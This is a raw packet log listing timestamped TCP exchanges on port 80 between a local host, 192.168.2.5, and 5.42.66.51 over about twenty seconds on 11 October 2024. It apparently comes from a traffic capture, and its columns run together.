                                                                                                Oct 11, 2024 20:38:12.023457050 CEST80500045.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:12.138653994 CEST5000480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:12.224672079 CEST5000680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:12.478418112 CEST80500045.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:12.478507996 CEST80500045.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:12.478563070 CEST5000480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:12.479088068 CEST80500045.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:12.479281902 CEST5000480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:12.480782986 CEST80500065.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:12.481355906 CEST80500065.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:12.481375933 CEST80500065.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:12.559078932 CEST80500065.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:12.638652086 CEST5000680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:12.820523024 CEST80500065.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:12.935524940 CEST5000680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:12.953207970 CEST5000480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:12.953263044 CEST5000680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:12.953504086 CEST5000780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:12.958386898 CEST80500075.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:12.958463907 CEST5000780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:12.958514929 CEST80500045.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:12.958575010 CEST5000780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:12.958575010 CEST5000480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:12.958985090 CEST80500065.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:12.959028006 CEST5000680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:12.963423014 CEST80500075.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:13.310591936 CEST5000780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:13.315799952 CEST80500075.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:13.315824986 CEST80500075.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:13.315994024 CEST80500075.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:13.483961105 CEST5000880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:13.489116907 CEST80500085.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:13.489187002 CEST5000880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:13.489424944 CEST5000880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:13.494647980 CEST80500085.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:13.660278082 CEST80500075.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:13.728854895 CEST5000780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:13.790978909 CEST80500075.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:13.841928005 CEST5000880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:13.846992970 CEST80500085.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:13.847203970 CEST80500085.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:13.858397961 CEST5000780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:13.965629101 CEST5000780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:13.966093063 CEST5000980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:13.971029043 CEST80500075.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:13.971091986 CEST5000780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:13.972026110 CEST80500095.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:13.972094059 CEST5000980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:13.972225904 CEST5000980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:13.977684975 CEST80500095.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:14.326225996 CEST5000980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:14.331429958 CEST80500095.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:14.331484079 CEST80500095.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:14.331511974 CEST80500095.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:14.680957079 CEST80500095.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:14.807430029 CEST80500095.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:14.807518005 CEST5000980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:15.947443962 CEST5000980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:15.947824955 CEST5001080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:15.953380108 CEST80500105.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:15.953567028 CEST5001080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:15.954253912 CEST5001080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:15.954838991 CEST80500095.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:15.955235958 CEST5000980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:15.959319115 CEST80500105.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:16.310688972 CEST5001080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:16.316015005 CEST80500105.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:16.316082001 CEST80500105.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:16.316112995 CEST80500105.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:16.641030073 CEST80500105.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:16.749174118 CEST5001080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:16.798054934 CEST80500105.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:16.953658104 CEST5001080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:16.991592884 CEST5001080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:16.991889000 CEST5001180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:16.997987032 CEST80500105.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:16.998025894 CEST80500115.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:16.998060942 CEST5001080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:16.998214960 CEST5001180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:17.012120962 CEST5001180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:17.017316103 CEST80500115.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:17.231440067 CEST80500085.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:17.363260984 CEST80500085.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:17.363487005 CEST5000880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:17.384345055 CEST5001180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:17.389231920 CEST80500115.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:17.389381886 CEST80500115.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:17.389409065 CEST80500115.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:17.743748903 CEST80500115.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:17.826237917 CEST5001180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:17.875227928 CEST80500115.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:18.029268980 CEST5001180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:18.121179104 CEST5000880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:18.121426105 CEST5001180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:18.121654987 CEST5001280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:18.126439095 CEST80500085.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:18.126595974 CEST5000880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:18.126703978 CEST80500125.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:18.126770973 CEST5001280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:18.126899004 CEST5001280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:18.127546072 CEST80500115.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:18.127664089 CEST5001180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:18.131961107 CEST80500125.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:18.417077065 CEST5001380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:18.422246933 CEST80500135.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:18.422333002 CEST5001380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:18.422544956 CEST5001380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:18.428400993 CEST80500135.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:18.482461929 CEST5001280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:18.487801075 CEST80500125.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:18.487838030 CEST80500125.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:18.487865925 CEST80500125.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:18.780086994 CEST5001380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:18.785192966 CEST80500135.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:18.785504103 CEST80500135.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:18.855479002 CEST80500125.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:18.919905901 CEST5001280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:18.989119053 CEST80500125.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:19.029283047 CEST5001280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:19.119211912 CEST80500135.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:19.163261890 CEST5001280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:19.163701057 CEST5001480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:19.169004917 CEST80500145.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:19.169116974 CEST5001480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:19.169430971 CEST5001480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:19.169488907 CEST80500125.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:19.169598103 CEST5001280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:19.174343109 CEST80500145.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:19.247859955 CEST80500135.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:19.247932911 CEST5001380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:19.513806105 CEST5001480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:19.518929958 CEST80500145.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:19.519098997 CEST80500145.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:19.519114017 CEST80500145.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:19.874109030 CEST80500145.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:20.009227037 CEST80500145.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:20.009294033 CEST5001480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:20.586677074 CEST5001380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:20.587105989 CEST5001480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:20.592434883 CEST5001580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:20.593785048 CEST80500135.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:20.593920946 CEST5001380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:20.595581055 CEST80500145.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:20.595633030 CEST5001480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:20.597467899 CEST80500155.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:20.597548962 CEST5001580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:20.597652912 CEST5001580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:20.603151083 CEST80500155.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:20.736066103 CEST5001680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:20.741209030 CEST80500165.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:20.741286039 CEST5001680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:20.741406918 CEST5001680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:20.746469975 CEST80500165.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:20.951256990 CEST5001580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:20.956319094 CEST80500155.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:20.958720922 CEST80500155.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:21.091864109 CEST5001680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:21.096786976 CEST80500165.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:21.096935987 CEST80500165.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:21.097461939 CEST80500165.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:21.353313923 CEST80500155.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:21.435524940 CEST5001580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:21.487262011 CEST80500155.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:21.508263111 CEST80500165.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:21.544894934 CEST5001580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:21.641164064 CEST80500165.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:21.641315937 CEST5001680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:21.762857914 CEST5001580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:21.763034105 CEST5001680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:21.763319969 CEST5001780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:21.768336058 CEST80500155.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:21.768393040 CEST5001580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:21.768469095 CEST80500175.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:21.768853903 CEST5001780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:21.769016981 CEST5001780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:21.769402981 CEST80500165.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:21.769452095 CEST5001680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:21.773979902 CEST80500175.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:22.123220921 CEST5001780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:22.128190041 CEST80500175.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:22.128257036 CEST80500175.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:22.128271103 CEST80500175.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:22.458251953 CEST80500175.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:22.503130913 CEST5001880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:22.508085012 CEST80500185.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:22.508245945 CEST5001880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:22.508526087 CEST5001880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:22.513664961 CEST80500185.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:22.587789059 CEST80500175.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:22.587867975 CEST5001780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:22.735690117 CEST5001780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:22.736627102 CEST5001980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:22.741031885 CEST80500175.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:22.741086006 CEST5001780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:22.741470098 CEST80500195.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:22.741534948 CEST5001980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:22.741631985 CEST5001980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:22.746534109 CEST80500195.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:22.857636929 CEST5001880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:22.863898993 CEST80500185.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:22.864005089 CEST80500185.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:23.091861963 CEST5001980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:23.096950054 CEST80500195.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:23.096975088 CEST80500195.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:23.096987963 CEST80500195.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:26.221218109 CEST80500185.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:26.380939007 CEST80500185.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:26.381129026 CEST5001880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:26.455749989 CEST80500195.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:26.502000093 CEST5001980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:26.599823952 CEST80500195.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:26.759736061 CEST5001980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:26.888494968 CEST5001880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:26.888921022 CEST5001980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:26.889250040 CEST5002080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:26.893897057 CEST80500185.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:26.893971920 CEST5001880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:26.894351006 CEST80500195.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:26.894412994 CEST5001980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:26.894587040 CEST80500205.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:26.894658089 CEST5002080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:26.894817114 CEST5002080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:26.899951935 CEST80500205.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:27.248275042 CEST5002080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:27.253309965 CEST80500205.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:27.253429890 CEST80500205.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:27.253443003 CEST80500205.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:27.392668962 CEST5002180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:27.398220062 CEST80500215.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:27.398317099 CEST5002180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:27.398423910 CEST5002180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:27.403871059 CEST80500215.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:27.572762966 CEST80500205.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:27.701010942 CEST5002080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:27.703151941 CEST80500205.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:27.755017042 CEST5002180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:27.759994030 CEST80500215.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:27.760154009 CEST80500215.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:27.826234102 CEST5002080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:28.083930969 CEST80500215.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:28.212970972 CEST80500215.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:28.213490009 CEST5002180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:28.229811907 CEST5002180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:28.229815006 CEST5002080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:28.236397982 CEST80500215.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:28.236845970 CEST80500205.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:28.236924887 CEST5002080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:28.443336964 CEST80500215.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:28.443582058 CEST5002180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:28.448571920 CEST80500215.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:28.448605061 CEST80500215.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:28.448632956 CEST80500215.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:28.775456905 CEST80500215.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:28.935532093 CEST5002180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:28.941869974 CEST5002180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:28.942395926 CEST5002280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:28.947010040 CEST80500215.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:28.947072983 CEST5002180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:28.947324991 CEST80500225.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:28.947396040 CEST5002280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:28.947490931 CEST5002280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:28.952820063 CEST80500225.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:29.229770899 CEST5002380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:29.235023022 CEST80500235.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:29.235096931 CEST5002380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:29.236041069 CEST5002380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:29.240861893 CEST80500235.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:29.295125008 CEST5002280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:29.300035954 CEST80500225.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:29.300143003 CEST80500225.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:29.300157070 CEST80500225.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:29.591950893 CEST5002380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:29.597049952 CEST80500235.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:29.597209930 CEST80500235.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:29.631477118 CEST80500225.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:29.732384920 CEST5002280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:29.759079933 CEST80500225.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:29.919945002 CEST5002280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:29.938611984 CEST80500235.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:29.939907074 CEST5002280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:29.940010071 CEST5002480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:29.945208073 CEST80500225.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:29.945616007 CEST80500245.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:29.945626974 CEST5002280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:29.945704937 CEST5002480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:29.945889950 CEST5002480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:29.950761080 CEST80500245.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:30.044975996 CEST5002380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:30.071259022 CEST80500235.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:30.248069048 CEST5002380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:30.295219898 CEST5002480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:30.300335884 CEST80500245.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:30.300534010 CEST80500245.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:30.300884962 CEST80500245.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:30.690289974 CEST80500245.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:30.823793888 CEST5002480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:30.825090885 CEST80500245.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:31.005300999 CEST5002380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:31.005882025 CEST5002580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:31.005938053 CEST5002480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:31.011315107 CEST80500255.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:31.011400938 CEST5002580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:31.011518955 CEST5002580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:31.011617899 CEST80500235.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:31.012152910 CEST80500245.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:31.012212992 CEST5002380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:31.012231112 CEST5002480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:31.017385960 CEST80500255.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:31.078138113 CEST5002680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:31.078950882 CEST5002580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:31.083096981 CEST80500265.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:31.083165884 CEST5002680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:31.086966991 CEST5002680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:31.091876030 CEST80500265.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:31.124339104 CEST80500255.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:31.223831892 CEST5002780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:31.229063988 CEST80500275.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:31.229171038 CEST5002780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:31.229310036 CEST5002780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:31.234658003 CEST80500275.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:31.439220905 CEST5002680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:31.444298983 CEST80500265.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:31.444503069 CEST80500265.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:31.496764898 CEST80500255.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:31.496850967 CEST5002580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:31.578094006 CEST5002780192.168.2.55.42.66.51
